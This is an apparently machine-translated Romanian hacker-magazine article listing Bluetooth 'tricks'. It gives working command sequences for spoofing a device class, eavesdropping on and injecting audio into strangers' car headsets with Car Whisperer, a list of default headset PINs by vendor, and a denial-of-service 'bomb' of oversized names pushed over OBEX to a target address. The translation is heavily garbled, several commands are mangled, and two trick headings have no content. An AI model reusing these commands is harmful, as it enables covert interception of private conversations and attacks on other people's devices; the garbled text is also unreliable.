Trucuri cu mici trucuri Bluetooth folosi „dinte albastru“

Toată lumea știe că, cu ajutorul Bluetooth, puteți transfera fișierul din dispozitiv pe dispozitiv sau conectați un set de căști fără fir. Dar aceste oportunități nu sunt limitate la aceasta. Având cu ei instrumentul potrivit, puteți crea miracole reale. Deci, de ce să nu se încerce ca un magician?







Built-in tehnologia Bluetooth (sau, mai formal, IEEE 802.15.3) pentru o lungă perioadă de timp a încetat să fie o raritate. costul unitar este atât de sărac încât să nu-l încorpora în mobil, laptop sau PDA doar leneș producător. Și apoi - din motive de marketing. Pe scurt, Bluetooth este folosit în aproape toate. Dar numai puțini știu că, folosind tehnologia, riscul de a da datele lor confidențiale. Dar să începem toate la fel cu bine!

Trucul 1: Utilizați BT pentru acces la distanță la calculator

Trick 2: Controlul accesului cu BT

Trick 3: trafic BT-Snifaem din eter

Maiestria începe cu înțelegerea. Ea nu apare dacă doriți vreodată să se uite în protocolul și să învețe modul în care datele sunt schimbate prin intermediul „dinte albastru“? Bluetooth Ascultarea de trafic poate fi efectuată numai „în sine“, care este efectuat pentru a intercepta nodul trafic de ieșire și de intrare, în cazul în care vă dau comenzi. În acest caz, o importanță considerabilă este așa-numitul Host Controller Interface (HCI), care permite accesul la transmițător. HCI-nod este conectat în mod normal la un nod driver de dispozitiv Bluetooth (în aval) și nodul L2CAP (în amonte). Platforma implicită Windows nu oferă o astfel de oportunitate. Cu toate acestea, dezvoltatorii de terță parte au fost eliberați
driver special care permite să traducă dongle-ul standard in sniffer. În mod tradițional indicativ în acest sens este lucrarea FTS4BT wireless Bluetooth Protocol Analyzer. avere în picioare. atinge produs care acceptă noul Bluetooth v2.0 + EDR. pe baza cărora dispozitive moderne funcționează și, în plus, este capabil să zboare decoda tot traficul din aer, ușor audio otsortirovyvaya, date, aplicații, protocoale, și multe altele. Este clar că pentru sniffing (și în general) sunt cele mai relevante din clasa USB dongle 1, a cărei rază ajunge la o sută de metri.

Trick 4: Lucrul direct cu BT-adaptor

Pentru o lungă perioadă de timp stivă Bluetooth pentru Windows oferă oportunități atât de limitate. că programatorii ocolit pur și simplu pe partea platformei. Acest lucru explică de ce majoritatea programelor de distracție grave c «dinte albastru“ dezvoltat de platforma niksovuyu. O parte din sac de trucuri vom discuta la această platformă, și anume FreeBSD (vă reamintesc că discul ultima problemă, am stabilit un proaspăt 7.0 de eliberare a sistemului de operare). Tehnologia Bluetooth în sine a devenit acceptat în mod oficial pe ea numai cu a cincea ramură pe baza subsistemului Netgraph. Mă bucur că majoritatea USB-adaptoare sunt compatibile cu driverul ng_ubt (este necesar să existe o conexiune la aparat). Să încercăm?

  1. Conectați dispozitivul: kldload ng_ubt
  2. Copiați stiva script-ul podgruzki într-un loc convenabil: cp /usr/share/examples/netgraph/bluetooth/rc.bluetooth /usr/local/etc/rc.bluetooth
  3. Copiați stiva script-ul podgruzki într-un loc convenabil și rulați: /usr/local/etc/rc.bluetoots sh începe ubt0






Acum vreau să îndeplinească utilitate hccontrol. Acesta este unul dintre principalele programe pentru BT-modulul. Era ea, care efectuează toate operațiunile legate de interfața HCI, și are următoarea sintaxă: hccontrol -n <имя_hci_узла> <команда>. Testați funcționalitatea dispozitivelor noastre va scana aerul pentru prezența dispozitivelor:

hccontrol ubt0hci Cerere -n

Trick 5: Găsiți dispozitivele ascunse

O altă opțiune - este de a utiliza tehnici pasive. traduce dispozitivul în modul de așteptare, iar rețeaua să atribuie un nume atractiv:

hciconfig nume hci0 BT_YANDEX
hciconfig hci0 jos
hciconfig hci0 sus
hcidump -V | grep bdaddr

Rezultatul arată toate conexiunile de intrare, printre care pot fi ușor cu colegii de identificare ascunse.

Trick 6: interceptări ale convorbirilor pe cască eter

Una dintre principalele amenințări la tehnologia radio este faptul că datele pot fi interceptate. Primul lucru care vine în minte cu privire la Bluetooth - pentru a asculta oamenii vorbesc, folosind un set de căști. Și de multe ori e real! La festival hacker Ce Hack în experții din Olanda grupul Trifinite a demonstrat cum se utilizează un laptop cu Linux, un program special și o antenă direcțională poate fi auzit, după cum reiese prin conducător auto Bluetooth-cască de o mașină care trece. Grupul a dezvoltat programul Car Whisperer ( "Whisperer Car"). Caracteristicile programului sunt relativ mici: doar asculta pe cei care au uitat să schimbe fabrica implicit parola de acces Bluetooth cum ar fi
"0000" sau "1234". Dar aceste colegii săraci, crede-mă, foarte, foarte mult! „Whisper“ și este capabil să treacă cu succes pană «asocierea» dispozitive, care primesc informații transmise sau hedseta karkita la mobil. Vreau să atrag atenția: utilitar vă permite să se obțină nu numai informații transmise între hedsetom și telefoane mobile, dar, de asemenea, injectați spate. Am decis să testeze posibilitățile acestui program prin descărcarea Whisperer auto pe site-ul dezvoltatorului.

Înainte de operația se recomanda schimbarea clasei dispozitivului, în special în cazul în care programul este utilizat cu calculatorul:

hciconfig adaptor clasa 0x500204
# 0x500204 - o clasă de «telefon»

În caz contrar, unele supă de „inteligent“ poate mirosi un șobolan. Uita-te la sintaxa utilitar care arată după cum urmează:

Am implementat de fișierul direct din folderul Utilities, și ca producția indicată out.raw:

/ Carwhisperer 0 message.raw /tmp/out.raw
00: 15: 0E: 91: 19: 73

Ieșirea este fișier out.raw. Ascultați-l în forma sa pură este imposibil: de a converti în format audio, care va necesita utilitate suplimentară. Fit destul de câteva convertoare audio, de exemplu, Sox.

-r prime 8000 -c 1 -s -w out.raw -t wav -r
44100 -c 2 out.wav

În practică, se pare, după cum urmează. În primul rând căutarea setului activ prin «căutarea sdptool HS» comandă care dă aproximativ răspunsul:

Chestionarea.
Se caută HS pe 00: 0A: 3A: 54: 71: 95.
Nume serviciu: Setul cu cască
RecHandle Serviciu: 0x10009
Lista Servicii ID clasă:
"Casca" (0x1108)
"Generic Audio" (0x1203)
Protocol Lista Descriptorul:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Canal: 7
Listă limba de baza Attr:
code_ISO639: 0x656e
Codificare: 0x6a
base_offset: 0x100
Profil Descriptorul Lista:
"Casca" (0x1108)
Versiune: 0x0100

Nokia (00: 02 :. EE) - pini = "5475"
Audi UHV (00: 0E :. 9F) - pini = "1234"
O'Neill (00:80:37.) - PIN = "8761"
Cellink (00: 0A :. 94) - PIN = "1234"
Eazix (00: 0C :. 84) - PIN = "1234"

Trick 7: DDoS BT-dispozitive

hciconfig numele hci0 `perl -e„de imprimare "cenușă" x 3137'`
# Comanda pentru Linux
hccontrol adaptor change_local_name -n "nume nou")
# Exemplu pentru FreeBSD

  1. În primul rând, o „bombă“. Un exemplu bine-cunoscut:
    echo de imprimare "skvz" `perl -e“ x 3137'`> fișier
  2. Apoi, utilizați un utilitar modificat pentru a comunica cu OBEX - USSP PUSH (xmailserver.org/ussp-push.html)
    ./ Obextool împinge fișier 00: 0A: 3A: 54: 71: 95 `perl -e„print "skvz" x 3137'` 3